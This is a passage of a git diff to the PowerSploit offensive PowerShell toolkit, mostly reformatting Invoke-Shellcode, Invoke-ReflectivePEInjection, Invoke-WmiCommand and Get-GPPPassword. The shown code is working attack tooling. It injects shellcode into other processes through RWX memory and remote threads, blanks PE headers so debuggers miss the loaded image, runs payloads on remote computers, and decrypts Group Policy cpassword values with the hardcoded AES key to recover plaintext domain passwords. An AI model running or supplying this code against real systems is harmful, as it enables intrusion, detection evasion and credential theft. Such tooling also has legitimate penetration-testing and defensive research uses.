+            if ($Success -eq $false)
+            {
+                Write-Warning "Unable to call VirtualFree on the PE's memory. Continuing anyways." -WarningAction Continue
+            }
+        }
+
+        Write-Verbose "Done!"
+    }
+
+    Main
 }
 
 #Main function to either run the script locally or remotely
 Function Main
 {
-	if (($PSCmdlet.MyInvocation.BoundParameters["Debug"] -ne $null) -and $PSCmdlet.MyInvocation.BoundParameters["Debug"].IsPresent)
-	{
-		$DebugPreference  = "Continue"
-	}
-	
-	Write-Verbose "PowerShell ProcessID: $PID"
-	
-	#Verify the image is a valid PE file
-	$e_magic = ($PEBytes[0..1] | % {[Char] $_}) -join ''
+    if (($PSCmdlet.MyInvocation.BoundParameters["Debug"] -ne $null) -and $PSCmdlet.MyInvocation.BoundParameters["Debug"].IsPresent)
+    {
+        $DebugPreference  = "Continue"
+    }
+
+    Write-Verbose "PowerShell ProcessID: $PID"
+
+    #Verify the image is a valid PE file
+    $e_magic = ($PEBytes[0..1] | ForEach-Object {[Char] $_}) -join ''
 
     if ($e_magic -ne 'MZ')
     {
         throw 'PE is not a valid PE file.'
     }
 
-	if (-not $DoNotZeroMZ) {
-		# Remove 'MZ' from the PE file so that it cannot be detected by .imgscan in WinDbg
-		# TODO: Investigate how much of the header can be destroyed, I'd imagine most of it can be.
-		$PEBytes[0] = 0
-		$PEBytes[1] = 0
-	}
-	
-	#Add a "program name" to exeargs, just so the string looks as normal as possible (real args start indexing at 1)
-	if ($ExeArgs -ne $null -and $ExeArgs -ne '')
-	{
-		$ExeArgs = "ReflectiveExe $ExeArgs"
-	}
-	else
-	{
-		$ExeArgs = "ReflectiveExe"
-	}
-
-	if ($ComputerName -eq $null -or $ComputerName -imatch "^\s*$")
-	{
-		Invoke-Command -ScriptBlock $RemoteScriptBlock -ArgumentList @($PEBytes, $FuncReturnType, $ProcId, $ProcName,$ForceASLR)
-	}
-	else
-	{
-		Invoke-Command -ScriptBlock $RemoteScriptBlock -ArgumentList @($PEBytes, $FuncReturnType, $ProcId, $ProcName,$ForceASLR) -ComputerName $ComputerName
-	}
+    if (-not $DoNotZeroMZ) {
+        # Remove 'MZ' from the PE file so that it cannot be detected by .imgscan in WinDbg
+        # TODO: Investigate how much of the header can be destroyed, I'd imagine most of it can be.
+        $PEBytes[0] = 0
+        $PEBytes[1] = 0
+    }
+
+    #Add a "program name" to exeargs, just so the string looks as normal as possible (real args start indexing at 1)
+    if ($ExeArgs -ne $null -and $ExeArgs -ne '')
+    {
+        $ExeArgs = "ReflectiveExe $ExeArgs"
+    }
+    else
+    {
+        $ExeArgs = "ReflectiveExe"
+    }
+
+    if ($ComputerName -eq $null -or $ComputerName -imatch "^\s*$")
+    {
+        Invoke-Command -ScriptBlock $RemoteScriptBlock -ArgumentList @($PEBytes, $FuncReturnType, $ProcId, $ProcName,$ForceASLR)
+    }
+    else
+    {
+        Invoke-Command -ScriptBlock $RemoteScriptBlock -ArgumentList @($PEBytes, $FuncReturnType, $ProcId, $ProcName,$ForceASLR) -ComputerName $ComputerName
+    }
 }
 
 Main
diff --git a/CodeExecution/Invoke-Shellcode.ps1 b/CodeExecution/Invoke-Shellcode.ps1
index 2879558..1e889f6 100644
--- a/CodeExecution/Invoke-Shellcode.ps1
+++ b/CodeExecution/Invoke-Shellcode.ps1
@@ -5,22 +5,22 @@ function Invoke-Shellcode
 

 Inject shellcode into the process ID of your choosing or within the context of the running PowerShell process.

 

-PowerSploit Function: Invoke-Shellcode

-Author: Matthew Graeber (@mattifestation)

-License: BSD 3-Clause

-Required Dependencies: None

-Optional Dependencies: None

- 

+PowerSploit Function: Invoke-Shellcode  

+Author: Matthew Graeber (@mattifestation)  

+License: BSD 3-Clause  

+Required Dependencies: None  

+Optional Dependencies: None  

+

 .DESCRIPTION

 

 Portions of this project was based upon syringe.c v1.2 written by Spencer McIntyre

 

 PowerShell expects shellcode to be in the form 0xXX,0xXX,0xXX. To generate your shellcode in this form, you can use this command from within Backtrack (Thanks, Matt and g0tm1lk):

 

-msfpayload windows/exec CMD="cmd /k calc" EXITFUNC=thread C | sed '1,6d;s/[";]//g;s/\\/,0/g' | tr -d '\n' | cut -c2- 

+msfpayload windows/exec CMD="cmd /k calc" EXITFUNC=thread C | sed '1,6d;s/[";]//g;s/\\/,0/g' | tr -d '\n' | cut -c2-

 

 Make sure to specify 'thread' for your exit process. Also, don't bother encoding your shellcode. It's entirely unnecessary.

- 

+

 .PARAMETER ProcessID

 

 Process ID of the process you want to inject shellcode into.

@@ -35,7 +35,7 @@ Injects shellcode without prompting for confirmation. By default, Invoke-Shellco
 

 .EXAMPLE

 

-C:\PS> Invoke-Shellcode -ProcessId 4274

+Invoke-Shellcode -ProcessId 4274

 

 Description

 -----------

@@ -43,7 +43,7 @@ Inject shellcode into process ID 4274.
 

 .EXAMPLE

 

-C:\PS> Invoke-Shellcode

+Invoke-Shellcode

 

 Description

 -----------

@@ -51,27 +51,32 @@ Inject shellcode into the running instance of PowerShell.
 

 .EXAMPLE

 

-C:\PS> Invoke-Shellcode -Shellcode @(0x90,0x90,0xC3)

-    

+Invoke-Shellcode -Shellcode @(0x90,0x90,0xC3)

+

 Description

 -----------

 Overrides the shellcode included in the script with custom shellcode - 0x90 (NOP), 0x90 (NOP), 0xC3 (RET)

 Warning: This script has no way to validate that your shellcode is 32 vs. 64-bit!

 #>

 

-[CmdletBinding( DefaultParameterSetName = 'RunLocal', SupportsShouldProcess = $True , ConfirmImpact = 'High')] Param (

-    [ValidateNotNullOrEmpty()]

-    [UInt16]

-    $ProcessID,

-    

-    [Parameter( ParameterSetName = 'RunLocal' )]

-    [ValidateNotNullOrEmpty()]

-    [Byte[]]

-    $Shellcode,

-    

-    [Switch]

-    $Force = $False

-)

+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]

+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSAvoidUsingWMICmdlet', '')]

+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseApprovedVerbs', '')]

+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseDeclaredVarsMoreThanAssignments', '')]

+    [CmdletBinding( DefaultParameterSetName = 'RunLocal', ConfirmImpact = 'High')]

+    Param (

+        [ValidateNotNullOrEmpty()]

+        [UInt16]

+        $ProcessID,

+

+        [Parameter( ParameterSetName = 'RunLocal' )]

+        [ValidateNotNullOrEmpty()]

+        [Byte[]]

+        $Shellcode,

+

+        [Switch]

+        $Force = $False

+    )

 

     Set-StrictMode -Version 2.0

 

@@ -81,17 +86,17 @@ Warning: This script has no way to validate that your shellcode is 32 vs. 64-bit
         # This could have been validated via 'ValidateScript' but the error generated with Get-Process is more descriptive

         Get-Process -Id $ProcessID -ErrorAction Stop | Out-Null

     }

-    

+

     function Local:Get-DelegateType

     {

         Param

         (

             [OutputType([Type])]

-            

+

             [Parameter( Position = 0)]

             [Type[]]

             $Parameters = (New-Object Type[](0)),

-            

+

             [Parameter( Position = 1 )]

             [Type]

             $ReturnType = [Void]

@@ -106,7 +111,7 @@ Warning: This script has no way to validate that your shellcode is 32 vs. 64-bit
         $ConstructorBuilder.SetImplementationFlags('Runtime, Managed')

         $MethodBuilder = $TypeBuilder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $ReturnType, $Parameters)

         $MethodBuilder.SetImplementationFlags('Runtime, Managed')

-        

+

         Write-Output $TypeBuilder.CreateType()

     }

 

@@ -115,11 +120,11 @@ Warning: This script has no way to validate that your shellcode is 32 vs. 64-bit
         Param

         (

             [OutputType([IntPtr])]

-        

+

             [Parameter( Position = 0, Mandatory = $True )]

             [String]

             $Module,

-            

+

             [Parameter( Position = 1, Mandatory = $True )]

             [String]

             $Procedure

@@ -136,7 +141,7 @@ Warning: This script has no way to validate that your shellcode is 32 vs. 64-bit
         $Kern32Handle = $GetModuleHandle.Invoke($null, @($Module))

         $tmpPtr = New-Object IntPtr

         $HandleRef = New-Object System.Runtime.InteropServices.HandleRef($tmpPtr, $Kern32Handle)

-        

+

         # Return the address of the function

         Write-Output $GetProcAddress.Invoke($null, @([System.Runtime.InteropServices.HandleRef]$HandleRef, $Procedure))

     }

@@ -151,12 +156,12 @@ Warning: This script has no way to validate that your shellcode is 32 vs. 64-bit
             $LittleEndianByteArray = New-Object Byte[](0)

             $Address.ToString("X$($IntSizePtr*2)") -split '([A-F0-9]{2})' | ForEach-Object { if ($_) { $LittleEndianByteArray += [Byte] ('0x{0}' -f $_) } }

             [System.Array]::Reverse($LittleEndianByteArray)

-            

+

             Write-Output $LittleEndianByteArray

         }

-        

+

         $CallStub = New-Object Byte[](0)

-        

+

         if ($IntSizePtr -eq 8)

         {

             [Byte[]] $CallStub = 0x48,0xB8                      # MOV   QWORD RAX, &shellcode

@@ -177,7 +182,7 @@ Warning: This script has no way to validate that your shellcode is 32 vs. 64-bit
             $CallStub += ConvertTo-LittleEndian $ExitThreadAddr # &ExitThread

             $CallStub += 0xFF,0xD0                              # CALL  EAX

         }

-        

+

         Write-Output $CallStub

     }

 

@@ -185,7 +190,7 @@ Warning: This script has no way to validate that your shellcode is 32 vs. 64-bit
     {

         # Open a handle to the process you want to inject into

         $hProcess = $OpenProcess.Invoke(0x001F0FFF, $false, $ProcessID) # ProcessAccessFlags.All (0x001F0FFF)

-        

+

         if (!$hProcess)

         {

             Throw "Unable to open a process handle for PID: $ProcessID"

@@ -197,7 +202,7 @@ Warning: This script has no way to validate that your shellcode is 32 vs. 64-bit
         {

             # Determine if the process specified is 32 or 64 bit

             $IsWow64Process.Invoke($hProcess, [Ref] $IsWow64) | Out-Null

-            

+

             if ((!$IsWow64) -and $PowerShell32bit)

             {

                 Throw 'Shellcode injection targeting a 64-bit process from 32-bit PowerShell is not supported. Use the 64-bit version of Powershell if you want this to work.'

@@ -208,7 +213,7 @@ Warning: This script has no way to validate that your shellcode is 32 vs. 64-bit
                 {

                     Throw 'No shellcode was placed in the $Shellcode32 variable!'

                 }

-                

+

                 $Shellcode = $Shellcode32

                 Write-Verbose 'Injecting into a Wow64 process.'

                 Write-Verbose 'Using 32-bit shellcode.'

@@ -219,7 +224,7 @@ Warning: This script has no way to validate that your shellcode is 32 vs. 64-bit
                 {

                     Throw 'No shellcode was placed in the $Shellcode64 variable!'

                 }

-                

+

                 $Shellcode = $Shellcode64

                 Write-Verbose 'Using 64-bit shellcode.'

             }

@@ -230,19 +235,19 @@ Warning: This script has no way to validate that your shellcode is 32 vs. 64-bit
             {

                 Throw 'No shellcode was placed in the $Shellcode32 variable!'

             }

-            

+

             $Shellcode = $Shellcode32

             Write-Verbose 'Using 32-bit shellcode.'

         }

 

         # Reserve and commit enough memory in remote process to hold the shellcode

         $RemoteMemAddr = $VirtualAllocEx.Invoke($hProcess, [IntPtr]::Zero, $Shellcode.Length + 1, 0x3000, 0x40) # (Reserve|Commit, RWX)

-        

+

         if (!$RemoteMemAddr)

         {

             Throw "Unable to allocate shellcode memory in PID: $ProcessID"

         }

-        

+

         Write-Verbose "Shellcode memory reserved at 0x$($RemoteMemAddr.ToString("X$([IntPtr]::Size*2)"))"

 

         # Copy shellcode into the previously allocated memory

@@ -255,25 +260,25 @@ Warning: This script has no way to validate that your shellcode is 32 vs. 64-bit
         {

             # Build 32-bit inline assembly stub to call the shellcode upon creation of a remote thread.

             $CallStub = Emit-CallThreadStub $RemoteMemAddr $ExitThreadAddr 32

-            

+

             Write-Verbose 'Emitting 32-bit assembly call stub.'

         }

         else

         {

             # Build 64-bit inline assembly stub to call the shellcode upon creation of a remote thread.

             $CallStub = Emit-CallThreadStub $RemoteMemAddr $ExitThreadAddr 64

-            

+

             Write-Verbose 'Emitting 64-bit assembly call stub.'

         }

 

         # Allocate inline assembly stub

         $RemoteStubAddr = $VirtualAllocEx.Invoke($hProcess, [IntPtr]::Zero, $CallStub.Length, 0x3000, 0x40) # (Reserve|Commit, RWX)

-        

+

         if (!$RemoteStubAddr)

         {

             Throw "Unable to allocate thread call stub memory in PID: $ProcessID"

         }

-        

+

         Write-Verbose "Thread call stub memory reserved at 0x$($RemoteStubAddr.ToString("X$([IntPtr]::Size*2)"))"

 

         # Write 32-bit assembly stub to remote process memory space

@@ -281,7 +286,7 @@ Warning: This script has no way to validate that your shellcode is 32 vs. 64-bit
 

         # Execute shellcode as a remote thread

         $ThreadHandle = $CreateRemoteThread.Invoke($hProcess, [IntPtr]::Zero, 0, $RemoteStubAddr, $RemoteMemAddr, 0, [IntPtr]::Zero)

-        

+

         if (!$ThreadHandle)

         {

             Throw "Unable to launch remote thread in PID: $ProcessID"

@@ -301,7 +306,7 @@ Warning: This script has no way to validate that your shellcode is 32 vs. 64-bit
                 Throw 'No shellcode was placed in the $Shellcode32 variable!'

                 return

             }

-            

+

             $Shellcode = $Shellcode32

             Write-Verbose 'Using 32-bit shellcode.'

         }

@@ -312,36 +317,36 @@ Warning: This script has no way to validate that your shellcode is 32 vs. 64-bit
                 Throw 'No shellcode was placed in the $Shellcode64 variable!'

                 return

             }

-            

+

             $Shellcode = $Shellcode64

             Write-Verbose 'Using 64-bit shellcode.'

         }

-    

+

         # Allocate RWX memory for the shellcode

         $BaseAddress = $VirtualAlloc.Invoke([IntPtr]::Zero, $Shellcode.Length + 1, 0x3000, 0x40) # (Reserve|Commit, RWX)

         if (!$BaseAddress)

         {

             Throw "Unable to allocate shellcode memory in PID: $ProcessID"

         }

-        

+

         Write-Verbose "Shellcode memory reserved at 0x$($BaseAddress.ToString("X$([IntPtr]::Size*2)"))"

 

         # Copy shellcode to RWX buffer

         [System.Runtime.InteropServices.Marshal]::Copy($Shellcode, 0, $BaseAddress, $Shellcode.Length)

-        

+

         # Get address of ExitThread function

         $ExitThreadAddr = Get-ProcAddress kernel32.dll ExitThread

-        

+

         if ($PowerShell32bit)

         {

             $CallStub = Emit-CallThreadStub $BaseAddress $ExitThreadAddr 32

-            

+

             Write-Verbose 'Emitting 32-bit assembly call stub.'

         }

         else

         {

             $CallStub = Emit-CallThreadStub $BaseAddress $ExitThreadAddr 64

-            

+

             Write-Verbose 'Emitting 64-bit assembly call stub.'

         }

 

@@ -351,7 +356,7 @@ Warning: This script has no way to validate that your shellcode is 32 vs. 64-bit
         {

             Throw "Unable to allocate thread call stub."

         }

-        

+

         Write-Verbose "Thread call stub memory reserved at 0x$($CallStubAddress.ToString("X$([IntPtr]::Size*2)"))"

 

         # Copy call stub to RWX buffer

@@ -366,7 +371,7 @@ Warning: This script has no way to validate that your shellcode is 32 vs. 64-bit
 

         # Wait for shellcode thread to terminate

         $WaitForSingleObject.Invoke($ThreadHandle, 0xFFFFFFFF) | Out-Null

-        

+

         $VirtualFree.Invoke($CallStubAddress, $CallStub.Length + 1, 0x8000) | Out-Null # MEM_RELEASE (0x8000)

         $VirtualFree.Invoke($BaseAddress, $Shellcode.Length + 1, 0x8000) | Out-Null # MEM_RELEASE (0x8000)

 

@@ -477,9 +482,9 @@ Warning: This script has no way to validate that your shellcode is 32 vs. 64-bit
         $CloseHandleAddr = Get-ProcAddress kernel32.dll CloseHandle

         $CloseHandleDelegate = Get-DelegateType @([IntPtr]) ([Bool])

         $CloseHandle = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CloseHandleAddr, $CloseHandleDelegate)

-    

+

         Write-Verbose "Injecting shellcode into PID: $ProcessId"

-        

+

         if ( $Force -or $psCmdlet.ShouldContinue( 'Do you wish to carry out your evil plans?',

                  "Injecting shellcode injecting into $((Get-Process -Id $ProcessId).ProcessName) ($ProcessId)!" ) )

         {

@@ -501,13 +506,13 @@ Warning: This script has no way to validate that your shellcode is 32 vs. 64-bit
         $WaitForSingleObjectAddr = Get-ProcAddress kernel32.dll WaitForSingleObject

         $WaitForSingleObjectDelegate = Get-DelegateType @([IntPtr], [Int32]) ([Int])

         $WaitForSingleObject = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WaitForSingleObjectAddr, $WaitForSingleObjectDelegate)

-        

+

         Write-Verbose "Injecting shellcode into PowerShell"

-        

+

         if ( $Force -or $psCmdlet.ShouldContinue( 'Do you wish to carry out your evil plans?',

                  "Injecting shellcode into the running PowerShell process!" ) )

         {

             Inject-LocalShellcode

         }

-    }   

+    }

 }

diff --git a/CodeExecution/Invoke-WmiCommand.ps1 b/CodeExecution/Invoke-WmiCommand.ps1
index 0c06424..9f03f9b 100644
--- a/CodeExecution/Invoke-WmiCommand.ps1
+++ b/CodeExecution/Invoke-WmiCommand.ps1
@@ -5,10 +5,10 @@ function Invoke-WmiCommand {
 Executes a PowerShell ScriptBlock on a target computer using WMI as a
 pure C2 channel.
 
-Author: Matthew Graeber
-License: BSD 3-Clause
-Required Dependencies: None
-Optional Dependencies: None
+Author: Matthew Graeber  
+License: BSD 3-Clause  
+Required Dependencies: None  
+Optional Dependencies: None  
 
 .DESCRIPTION
 
@@ -149,6 +149,9 @@ Write-Host in your scripts though, you probably don't deserve to get
 the output of your payload back. :P
 #>
 
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSAvoidUsingWMICmdlet', '')]
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSAvoidUsingInvokeExpression', '')]
     [CmdletBinding()]
     Param (
         [Parameter( Mandatory = $True )]
diff --git a/Exfiltration/Get-GPPPassword.ps1 b/Exfiltration/Get-GPPPassword.ps1
index 0c03e0a..f7be74c 100644
--- a/Exfiltration/Get-GPPPassword.ps1
+++ b/Exfiltration/Get-GPPPassword.ps1
@@ -2,246 +2,347 @@ function Get-GPPPassword {
 <#
 .SYNOPSIS
 
-    Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences.
-
-    PowerSploit Function: Get-GPPPassword
-    Author: Chris Campbell (@obscuresec)
-    License: BSD 3-Clause
-    Required Dependencies: None
-    Optional Dependencies: None
- 
+Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences.
+
+PowerSploit Function: Get-GPPPassword  
+Author: Chris Campbell (@obscuresec)  
+License: BSD 3-Clause  
+Required Dependencies: None  
+Optional Dependencies: None  
+
 .DESCRIPTION
 
-    Get-GPPPassword searches a domain controller for groups.xml, scheduledtasks.xml, services.xml and datasources.xml and returns plaintext passwords.
+Get-GPPPassword searches a domain controller for groups.xml, scheduledtasks.xml, services.xml and datasources.xml and returns plaintext passwords.
 
 .PARAMETER Server
-    
-    Specify the domain controller to search for. 
-    Default's to the users current domain
+
+Specify the domain controller to search for.
+Default's to the users current domain
+
+.PARAMETER SearchForest
+
+Map all reaschable trusts and search all reachable SYSVOLs.
 
 .EXAMPLE
 
-    PS C:\> Get-GPPPassword
-    
-    NewName   : [BLANK]
-    Changed   : {2014-02-21 05:28:53}
-    Passwords : {password12}
-    UserNames : {test1}
-    File      : \\DEMO.LAB\SYSVOL\demo.lab\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\DataSources\DataSources.xml
-
-    NewName   : {mspresenters}
-    Changed   : {2013-07-02 05:43:21, 2014-02-21 03:33:07, 2014-02-21 03:33:48}
-    Passwords : {Recycling*3ftw!, password123, password1234}
-    UserNames : {Administrator (built-in), DummyAccount, dummy2}
-    File      : \\DEMO.LAB\SYSVOL\demo.lab\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml
-
-    NewName   : [BLANK]
-    Changed   : {2014-02-21 05:29:53, 2014-02-21 05:29:52}
-    Passwords : {password, password1234$}
-    UserNames : {administrator, admin}
-    File      : \\DEMO.LAB\SYSVOL\demo.lab\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\ScheduledTasks\ScheduledTasks.xml
-
-    NewName   : [BLANK]
-    Changed   : {2014-02-21 05:30:14, 2014-02-21 05:30:36}
-    Passwords : {password, read123}
-    UserNames : {DEMO\Administrator, admin}
-    File      : \\DEMO.LAB\SYSVOL\demo.lab\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Services\Services.xml
+Get-GPPPassword
+
+NewName   : [BLANK]
+Changed   : {2014-02-21 05:28:53}
+Passwords : {password12}
+UserNames : {test1}
+File      : \\DEMO.LAB\SYSVOL\demo.lab\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\DataSources\DataSources.xml
+
+NewName   : {mspresenters}
+Changed   : {2013-07-02 05:43:21, 2014-02-21 03:33:07, 2014-02-21 03:33:48}
+Passwords : {Recycling*3ftw!, password123, password1234}
+UserNames : {Administrator (built-in), DummyAccount, dummy2}
+File      : \\DEMO.LAB\SYSVOL\demo.lab\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml
+
+NewName   : [BLANK]
+Changed   : {2014-02-21 05:29:53, 2014-02-21 05:29:52}
+Passwords : {password, password1234$}
+UserNames : {administrator, admin}
+File      : \\DEMO.LAB\SYSVOL\demo.lab\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\ScheduledTasks\ScheduledTasks.xml
+
+NewName   : [BLANK]
+Changed   : {2014-02-21 05:30:14, 2014-02-21 05:30:36}
+Passwords : {password, read123}
+UserNames : {DEMO\Administrator, admin}
+File      : \\DEMO.LAB\SYSVOL\demo.lab\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Services\Services.xml
 
 .EXAMPLE
-    PS C:\> Get-GPPPassword -Server EXAMPLE.COM
 
-    NewName   : [BLANK]
-    Changed   : {2014-02-21 05:28:53}
-    Passwords : {password12}
-    UserNames : {test1}
-    File      : \\EXAMPLE.COM\SYSVOL\demo.lab\Policies\{31B2F340-016D-11D2-945F-00C04FB982DA}\MACHINE\Preferences\DataSources\DataSources.xml
+Get-GPPPassword -Server EXAMPLE.COM
 
-    NewName   : {mspresenters}
-    Changed   : {2013-07-02 05:43:21, 2014-02-21 03:33:07, 2014-02-21 03:33:48}
-    Passwords : {Recycling*3ftw!, password123, password1234}
-    UserNames : {Administrator (built-in), DummyAccount, dummy2}
-    File      : \\EXAMPLE.COM\SYSVOL\demo.lab\Policies\{31B2F340-016D-11D2-945F-00C04FB9AB12}\MACHINE\Preferences\Groups\Groups.xml
+NewName   : [BLANK]
+Changed   : {2014-02-21 05:28:53}
+Passwords : {password12}
+UserNames : {test1}
+File      : \\EXAMPLE.COM\SYSVOL\demo.lab\Policies\{31B2F340-016D-11D2-945F-00C04FB982DA}\MACHINE\Preferences\DataSources\DataSources.xml
+
+NewName   : {mspresenters}
+Changed   : {2013-07-02 05:43:21, 2014-02-21 03:33:07, 2014-02-21 03:33:48}
+Passwords : {Recycling*3ftw!, password123, password1234}
+UserNames : {Administrator (built-in), DummyAccount, dummy2}
+File      : \\EXAMPLE.COM\SYSVOL\demo.lab\Policies\{31B2F340-016D-11D2-945F-00C04FB9AB12}\MACHINE\Preferences\Groups\Groups.xml
 
 .EXAMPLE
 
-    PS C:\> Get-GPPPassword | ForEach-Object {$_.passwords} | Sort-Object -Uniq
-    
-    password
-    password12
-    password123
-    password1234
-    password1234$
-    read123
-    Recycling*3ftw!
+Get-GPPPassword | ForEach-Object {$_.passwords} | Sort-Object -Uniq
+
+password
+password12
+password123
+password1234
+password1234$
+read123
+Recycling*3ftw!
 
 .LINK
-    
-    http://www.obscuresecurity.blogspot.com/2012/05/gpp-password-retrieval-with-powershell.html
-    https://github.com/mattifestation/PowerSploit/blob/master/Recon/Get-GPPPassword.ps1
-    http://esec-pentest.sogeti.com/exploiting-windows-2008-group-policy-preferences
-    http://rewtdance.blogspot.com/2012/06/exploiting-windows-2008-group-policy.html
+
+http://www.obscuresecurity.blogspot.com/2012/05/gpp-password-retrieval-with-powershell.html
+https://github.com/mattifestation/PowerSploit/blob/master/Recon/Get-GPPPassword.ps1
+http://esec-pentest.sogeti.com/exploiting-windows-2008-group-policy-preferences
+http://rewtdance.blogspot.com/2012/06/exploiting-windows-2008-group-policy.html
 #>
-    
+
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSAvoidUsingWMICmdlet', '')]
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSAvoidUsingPlainTextForPassword', '')]
     [CmdletBinding()]
     Param (
-            [ValidateNotNullOrEmpty()]
-            [String]
-            $Server = $Env:USERDNSDOMAIN
+        [ValidateNotNullOrEmpty()]
+        [String]
+        $Server = $Env:USERDNSDOMAIN,
+
+        [Switch]
+        $SearchForest
     )
-    
-    #Some XML issues between versions
-    Set-StrictMode -Version 2
-    
-    #define helper function that decodes and decrypts password
+
+    # define helper function that decodes and decrypts password
     function Get-DecryptedCpassword {
         [CmdletBinding()]
         Param (
-            [string] $Cpassword 
+            [string] $Cpassword
         )
 
         try {
-            #Append appropriate padding based on string length  
+            #Append appropriate padding based on string length
             $Mod = ($Cpassword.length % 4)
-            
+
             switch ($Mod) {
-            '1' {$Cpassword = $Cpassword.Substring(0,$Cpassword.Length -1)}
-            '2' {$Cpassword += ('=' * (4 - $Mod))}
-            '3' {$Cpassword += ('=' * (4 - $Mod))}
+                '1' {$Cpassword = $Cpassword.Substring(0,$Cpassword.Length -1)}
+                '2' {$Cpassword += ('=' * (4 - $Mod))}
+                '3' {$Cpassword += ('=' * (4 - $Mod))}
             }
 
             $Base64Decoded = [Convert]::FromBase64String($Cpassword)
-            
+
             #Create a new AES .NET Crypto Object
             $AesObject = New-Object System.Security.Cryptography.AesCryptoServiceProvider
             [Byte[]] $AesKey = @(0x4e,0x99,0x06,0xe8,0xfc,0xb6,0x6c,0xc9,0xfa,0xf4,0x93,0x10,0x62,0x0f,0xfe,0xe8,
                                  0xf4,0x96,0xe8,0x06,0xcc,0x05,0x79,0x90,0x20,0x9b,0x09,0xa4,0x33,0xb6,0x6c,0x1b)
-            
+
             #Set IV to all nulls to prevent dynamic generation of IV value
-            $AesIV = New-Object Byte[]($AesObject.IV.Length) 
+            $AesIV = New-Object Byte[]($AesObject.IV.Length)
             $AesObject.IV = $AesIV
             $AesObject.Key = $AesKey
-            $DecryptorObject = $AesObject.CreateDecryptor() 
+            $DecryptorObject = $AesObject.CreateDecryptor()
             [Byte[]] $OutBlock = $DecryptorObject.TransformFinalBlock($Base64Decoded, 0, $Base64Decoded.length)
-            
+
             return [System.Text.UnicodeEncoding]::Unicode.GetString($OutBlock)
-        } 
-        
-        catch {Write-Error $Error[0]}
-    }  
-    
-    #define helper function to parse fields from xml files
-    function Get-GPPInnerFields {
+        }
+
+        catch { Write-Error $Error[0] }
+    }
+
+    # helper function to parse fields from xml files
+    function Get-GPPInnerField {
     [CmdletBinding()]
         Param (
             $File
         )
-    
+
         try {
-            
             $Filename = Split-Path $File -Leaf
             [xml] $Xml = Get-Content ($File)
 
-            #declare empty arrays
-            $Cpassword = @()
-            $UserName = @()
-            $NewName = @()
-            $Changed = @()
-            $Password = @()
-    
-            #check for password field
-            if ($Xml.innerxml -like "*cpassword*"){
-            
-                Write-Verbose "Potential password in $File"
-                
-                switch ($Filename) {
-
-                    'Groups.xml' {
-                        $Cpassword += , $Xml | Select-Xml "/Groups/User/Properties/@cpassword" | Select-Object -Expand Node | ForEach-Object {$_.Value}
-                        $UserName += , $Xml | Select-Xml "/Groups/User/Properties/@userName" | Select-Object -Expand Node | ForEach-Object {$_.Value}
-                        $NewName += , $Xml | Select-Xml "/Groups/User/Properties/@newName" | Select-Object -Expand Node | ForEach-Object {$_.Value}
-                        $Changed += , $Xml | Select-Xml "/Groups/User/@changed" | Select-Object -Expand Node | ForEach-Object {$_.Value}
-                    }
-        
-                    'Services.xml' {  
-                        $Cpassword += , $Xml | Select-Xml "/NTServices/NTService/Properties/@cpassword" | Select-Object -Expand Node | ForEach-Object {$_.Value}
-                        $UserName += , $Xml | Select-Xml "/NTServices/NTService/Properties/@accountName" | Select-Object -Expand Node | ForEach-Object {$_.Value}
-                        $Changed += , $Xml | Select-Xml "/NTServices/NTService/@changed" | Select-Object -Expand Node | ForEach-Object {$_.Value}
-                    }
-        
-                    'Scheduledtasks.xml' {
-                        $Cpassword += , $Xml | Select-Xml "/ScheduledTasks/Task/Properties/@cpassword" | Select-Object -Expand Node | ForEach-Object {$_.Value}
-                        $UserName += , $Xml | Select-Xml "/ScheduledTasks/Task/Properties/@runAs" | Select-Object -Expand Node | ForEach-Object {$_.Value}
-                        $Changed += , $Xml | Select-Xml "/ScheduledTasks/Task/@changed" | Select-Object -Expand Node | ForEach-Object {$_.Value}
-                    }
-        
-                    'DataSources.xml' { 
-                        $Cpassword += , $Xml | Select-Xml "/DataSources/DataSource/Properties/@cpassword" | Select-Object -Expand Node | ForEach-Object {$_.Value}
-                        $UserName += , $Xml | Select-Xml "/DataSources/DataSource/Properties/@username" | Select-Object -Expand Node | ForEach-Object {$_.Value}
-                        $Changed += , $Xml | Select-Xml "/DataSources/DataSource/@changed" | Select-Object -Expand Node | ForEach-Object {$_.Value}                          
+            # check for the cpassword field
+            if ($Xml.innerxml -match 'cpassword') {
+
+                $Xml.GetElementsByTagName('Properties') | ForEach-Object {
+                    if ($_.cpassword) {
+                        $Cpassword = $_.cpassword
+                        if ($Cpassword -and ($Cpassword -ne '')) {
+                           $DecryptedPassword = Get-DecryptedCpassword $Cpassword
+                           $Password = $DecryptedPassword
+                           Write-Verbose "[Get-GPPInnerField] Decrypted password in '$File'"
+                        }
+
+                        if ($_.newName) {
+                            $NewName = $_.newName
+                        }
+
+                        if ($_.userName) {
+                            $UserName = $_.userName
+                        }
+                        elseif ($_.accountName) {
+                            $UserName = $_.accountName
+                        }
+                        elseif ($_.runAs) {
+                            $UserName = $_.runAs
+                        }
+
+                        try {
